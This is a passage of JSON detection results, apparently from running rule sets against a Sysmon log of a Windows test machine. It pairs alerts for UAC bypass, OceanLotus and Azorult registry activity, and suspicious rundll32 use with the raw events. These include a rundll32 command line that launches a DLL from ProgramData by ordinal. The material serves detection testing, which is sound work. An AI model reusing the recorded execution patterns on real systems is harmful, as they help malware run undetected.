Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=F359D3C074135BBCA9A4C98A6B6544690EDAE93D,MD5=02825976B19F123872914C233CF309BB,SHA256=0DD700BB6A992FFD40B0D2B41FC5875CD3B319A7079F67B3DC37428B5005B354,IMPHASH=45D79E943E6D34075123B434B5AE3DEB","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\OnKeyToken_KEB.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-15 13:17:02.659"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":416061,"Execution_attributes":{"ProcessID":3368,"ThreadID":4756},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-15T13:17:02.963417Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.734","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\__tmp_rar_sfx_access_check_2914968","UtcTime":"2020-10-23 
21:57:34.734"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423992,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:34.745175Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.751","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\d948","UtcTime":"2020-10-23 21:57:34.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423993,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:34.767786Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using 
.NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:22:14.491","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\sduchxll.tmp","UtcTime":"2020-10-23 21:57:36.328"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424049,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.332819Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 
21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424060,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375368Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424061,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375422Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424062,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375487Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 
21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424063,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375545Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424064,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376024Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424065,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376053Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 
21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424066,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376077Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424067,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376099Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:57:36.406"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424078,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.417723Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1216,"ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.171"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424081,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.176847Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\Rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:17.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424114,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.542300Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ParentProcessId":7552,"ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.542"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424115,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.543407Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:21.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424174,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.693498Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 
21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424244,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930237Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424245,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930339Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424246,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930392Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 
21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424247,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930441Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424248,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424249,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931290Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 
